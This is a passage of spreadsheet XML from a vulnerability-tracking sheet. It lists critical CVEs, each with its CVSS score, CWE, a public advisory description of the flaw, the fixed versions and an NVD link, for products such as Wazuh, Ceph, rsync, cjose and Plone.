      </c>
      <c r="D634" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="inlineStr"/>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a protocol change while processing HTTP/2 traffic could lead to type confusion in Suricata. Crafted traffic may cause Suricata to crash, resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable HTTP/2 parsing if it is not required.</t>
        </is>
      </c>
      <c r="M634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45764</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47702</t>
        </is>
      </c>
      <c r="C635" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D635" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="L635" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. In version 3.16.1, API tokens (bearer credentials used to authenticate against the builder API) are stored in the database as cleartext strings. An attacker who gains read access to the database (e.g., via SQL injection, backup exposure, or insider access) can extract all API tokens and impersonate any user without requiring a password or multi-factor authentication. Version 3.17.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47702</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48024</t>
        </is>
      </c>
      <c r="C636" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D636" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L636" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta3, cluster.unmerge_info() in framework/wazuh/core/cluster/cluster.py constructs paths from peer-controlled merge_type and name values in a merged synchronization archive. process_files_from_worker() in framework/wazuh/core/cluster/master.py does not adequately confine the resulting path to the declared cluster item directory. A cluster peer holding the shared Fernet key can use traversal in files_metadata.json or a merged-file header to write files such as /var/ossec/etc/ossec.conf. Replacing ossec.conf can configure root-executed commands and lead to code execution when Wazuh services reload. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48024</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48031</t>
        </is>
      </c>
      <c r="C637" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D637" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G637" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L637" s="5" t="inlineStr">
        <is>
          <t>go-base is a Go RESTful API Boilerplate template with JWT Authentication, backed by PostgreSQL. In versions prior to 2026-05-18, the JWT signing secret is hardcoded to the known string "random", letting any attacker who reads the public repository forge tokens for arbitrary users, including admin roles, and completely bypass authentication on all protected endpoints. This value is set in two places: the dev.env template (line 10) and a programmatic fallback in cmd/serve.go (line 35), so the application uses it even when no .env file is present. The original mitigation in auth/jwt/tokenauth.go (lines 22 to 25) only caught the exact string "random", letting other weak secrets through, and replaced it with an in-memory key that was not persisted, invalidating all tokens on every restart and effectively causing a denial-of-service. This issue has been fixed in version 2026-05-18.</t>
        </is>
      </c>
      <c r="M637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48031</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48039</t>
        </is>
      </c>
      <c r="C638" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D638" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L638" s="5" t="inlineStr">
        <is>
          <t>Meta Ads MCP is a Model Context Protocol (MCP) server that lets AI assistants run Meta Ads. Prior to version 1.0.109, `AuthInjectionMiddleware.dispatch()` at `http_auth_integration.py:272` unconditionally forwards unauthenticated Streamable HTTP requests to downstream MCP tool handlers without issuing a `401` response, allowing any network-reachable caller to invoke MCP tools without authentication. When no per-request credential is present, tool handlers fall back to the `META_ACCESS_TOKEN` environment variable, and when the downstream Meta Graph API call fails, `api.py:263–269` serialises the raw `httpx` request URL—including the operator's `access_token` as a query parameter—into the JSON-RPC response body, delivering the credential to the unauthenticated caller. Version 1.0.109 fixes the issue.</t>
        </is>
      </c>
      <c r="M638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48039</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48162</t>
        </is>
      </c>
      <c r="C639" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D639" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L639" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta3, DistributedAPI.send_tmp_file() in framework/wazuh/core/cluster/dapi/dapi.py joins an attacker-controlled tmp_file value to WAZUH_PATH without canonicalization or confinement. A cluster peer holding the shared Fernet key can use traversal or an absolute path to make the master return any readable file over the cluster channel. Reading /var/ossec/api/configuration/security/private_key.pem allows the peer to forge administrator REST API tokens offline and then exercise administrative privileges without creating an account. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48162</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49364</t>
        </is>
      </c>
      <c r="C640" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D640" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G640" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L640" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated network-adjacent attacker can leverage discovery to capture cluster administrative credentials during the initial cluster connection handshake.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49364</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49441</t>
        </is>
      </c>
      <c r="C641" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D641" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L641" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.3.0 until 4.14.6 and 5.0.0-beta3, the non-merged branch of process_files_from_worker() in framework/wazuh/core/cluster/master.py trusts a peer-controlled file_path key from files_metadata.json. The destination is joined to WAZUH_PATH without proving that it remains inside the directory selected by cluster_item_key. A cluster peer holding the shared Fernet key can upload a crafted extra-valid archive and overwrite security-sensitive files such as /var/ossec/etc/ossec.conf. Replacing ossec.conf can configure root-executed commands and lead to code execution after a service reload. This issue is fixed in versions 4.14.6 and 5.0.0-beta3.</t>
        </is>
      </c>
      <c r="M641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49441</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49849</t>
        </is>
      </c>
      <c r="C642" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D642" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L642" s="5" t="inlineStr">
        <is>
          <t>xShop is an open-source shop developed in Laravel. An Unrestricted File Upload vulnerability in xShop version 3.0.3 allows an authenticated administrator to upload executable files (e.g., .php). By uploading a specially crafted php file, an attacker can achieve Remote Code Execution (RCE) on the server, leading to a full system compromise. Version 3.0.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49849</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50152</t>
        </is>
      </c>
      <c r="C643" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D643" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L643" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the Monitor subscription handler fails to properly authorize access to the configuration-key store, allowing any CephX user with only  `mon allow r` capabilities to read the entire store by sending a single crafted MMonSubscribe message. The config-key store holds sensitive secrets including OSD LUKS disk-encryption passphrases and, on cephadm-managed clusters, the SSH private key that cephadm uses to reach every host in the cluster. Because that key grants root on every node under the default cephadm configuration, a low-privileged read-only account can escalate to full cluster and host compromise. This issue is fixed in versions 20.2.4 and 19.2.6</t>
        </is>
      </c>
      <c r="M643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50152</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51346</t>
        </is>
      </c>
      <c r="C644" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D644" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L644" s="5" t="inlineStr">
        <is>
          <t>SQL Injection vulnerability in StudIP 6.0.x before 6.0.3 and 5.4.x before 5.4.12 allows a remote attacker to execute arbitrary code and obtain sensitive information via the store() functions.</t>
        </is>
      </c>
      <c r="M644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51346</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52723</t>
        </is>
      </c>
      <c r="C645" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D645" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L645" s="5" t="inlineStr">
        <is>
          <t>ePA 3.x Integration implements the authorization workflow and writes Medical Information Objects to Germany's electronic patient record. Prior to 1.3.0, ePA 3.x Integration performs VAU server certificate validation in app/vau/VAUProtokoll.py without anchoring the signed_vau_server_pub_keys and AUT_VAU_CertData certificate path to independent trusted material. A network-positioned attacker between the DiGA backend and the ePA system can intercept the VAU handshake, supply attacker-controlled certificate and key material, and satisfy the circular trust relationship. Because TLS certificate verification is also disabled in affected versions, no independent server-authentication layer prevents the attack. The attacker can impersonate the VAU server, control the negotiated session keys, and read or modify all encrypted VAU traffic. This issue is fixed in version 1.3.0.</t>
        </is>
      </c>
      <c r="M645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52723</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52766</t>
        </is>
      </c>
      <c r="C646" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D646" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr">
        <is>
          <t>CWE-276, CWE-862</t>
        </is>
      </c>
      <c r="L646" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, the {{erasespamedcomments}} wiki action (actions/EraseSpamedCommentsAction.php) accepts a suppr[] array from POST and deletes every wiki page whose tag appears in that array, with no authorization check anywhere in the action body or in the page-deletion path it invokes. Combined with YesWiki's allow-by-default action ACL model, any user who has page write access, which is the default for everyone (default_write_acl='*') on a fresh install can permanently delete arbitrary wiki pages, including the front page, admin pages, and pages owned by other users. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52766</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53793</t>
        </is>
      </c>
      <c r="C647" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D647" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L647" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a path confinement bypass vulnerability that allows remote clients to escape the intended inner-module root confinement by constructing paths that resolve outside the chroot boundary when the module root contains a /./ boundary marker. Attackers can exploit improper handling of the /./ notation or forge delta-basis transfers referencing xname paths that cross the /./ boundary to gain unauthorized read or write access to files outside the module's subtree.</t>
        </is>
      </c>
      <c r="M647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53793</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53939</t>
        </is>
      </c>
      <c r="C648" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D648" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G648" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr">
        <is>
          <t>CWE-321, CWE-330</t>
        </is>
      </c>
      <c r="L648" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). In versions 0.6.1 through 0.6.2.5, when cjose encrypts a JWE using an AES-CBC-HMAC content-encryption algorithm (`A128CBC-HS256`, `A192CBC-HS384`, or `A256CBC-HS512`) together with any key-management algorithm that generates a fresh content-encryption key (CEK), the CEK is all zero bytes instead of being randomly generated. The resulting JWE is therefore encrypted and authenticated under a fixed, publicly known key, so anyone who obtains the JWE can recover the plaintext and forge or modify the content. This is fixed in version 0.6.2.6 by `_cjose_jwe_set_cek_aes_cbc()` generating the CEK from `RAND_bytes`. A regression test asserts that the `encrypted_key` differs across two encryptions for each AES-CBC-HMAC variant. Until upgrading, for data encrypted with cjose, three options are available. Use an AES-GCM `enc` (`A128GCM` / `A192GCM` / `A256GCM`) instead of an AES-CBC-HMAC `enc`,  use `alg=dir` with a caller-supplied CEK, or avoid using cjose for JWE encryption with the affected algorithm pair. These are mitigations for new ciphertexts only; data already encrypted under the zero key remains compromised and should be re-encrypted (and any secrets it contained rotated).</t>
        </is>
      </c>
      <c r="M648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53939</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55247</t>
        </is>
      </c>
      <c r="C649" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D649" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L649" s="5" t="inlineStr">
        <is>
          <t>plone.app.event provides the event content type for Plone. Prior to versions 5.2.4 and 6.0.1, the iCalendar import in src/plone/app/event/ical/importer.py accepts insufficiently restricted calendar and event URLs, does not adequately bound downloaded bytes or imported events, and commits work per event. A logged-in editor can make the server request internal network resources or local calendar files, exhaust resources and take the site offline, and store a malicious event URL that executes script in another user's browser. The fix restricts accepted URLs, applies MAXIMUM_ICAL_IMPORT_SIZE_BYTES and MAXIMUM_ICAL_IMPORT_EVENTS limits, uses transaction savepoints, and validates event URLs. This issue is fixed in versions 5.2.4 and 6.0.1.</t>
        </is>
      </c>
      <c r="M649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55247</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55248</t>
        </is>
      </c>
      <c r="C650" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D650" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G650" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L650" s="5" t="inlineStr">
        <is>
          <t>plone.app.portlets provides portlets and a Plone-specific user interface for plone.portlets. Prior to 5.0.8, 6.0.4, and 7.0.2, a member who can add an RSS portlet can set its feed URL to a very large response, causing src/plone/app/portlets/portlets/rss.py to download and retain excessive data in memory and deny service. The same RSS URL handling accepts internal hosts, IP addresses, single-word domains, and explicit ports, allowing server-side requests that can probe internal network services and open ports. A malicious feed item can also supply a JavaScript URL that is retained as the item link and can execute script when used by a victim. The affected logic includes _rss_feed_url_validator, _normal_url_validator, RSSFeed._retrieveFeed, RSSFeed._buildItemDict, and the FEED_DATA in-memory cache. This issue is fixed in versions 5.0.8, 6.0.4, and 7.0.2.</t>
        </is>
      </c>
      <c r="M650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55248</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55511</t>
        </is>
      </c>
      <c r="C651" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D651" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G651" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L651" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs allows a user with SystemPrivilege.ControlArchiving to create a double-quoted StreamSQL column name that is interpolated into generated Java source by Expression.fillCode_InputDefVars and Expression.sanitizeName. A sum aggregate reaches yamcs-core/src/main/java/org/yamcs/yarch/streamsql/CompilableAggregateExpression.java and yamcs-core/src/main/java/org/yamcs/yarch/streamsql/funct/SumExpression.java through SelectExpression.compile, where Janino SimpleCompiler.cook compiles the injected source. POST /api/archive/{instance}:executeSql can therefore execute arbitrary Java in the Yamcs server process, exposing mission data and credentials and permitting telemetry tampering or denial of service. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="M651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55511</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55536</t>
        </is>
      </c>
      <c r="C652" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D652" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-625</t>
        </is>
      </c>
      <c r="L652" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, Browser Server _handle_connection() checks Chrome extension origins with re.match() and the unanchored expression chrome-extension://[a-z0-9]{32}. Extra trailing characters pass before websocket.accept(), allowing start_session commands and unauthorized browser automation. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55536</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55640</t>
        </is>
      </c>
      <c r="C653" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D653" s="5" t="inlineStr">
        <is>
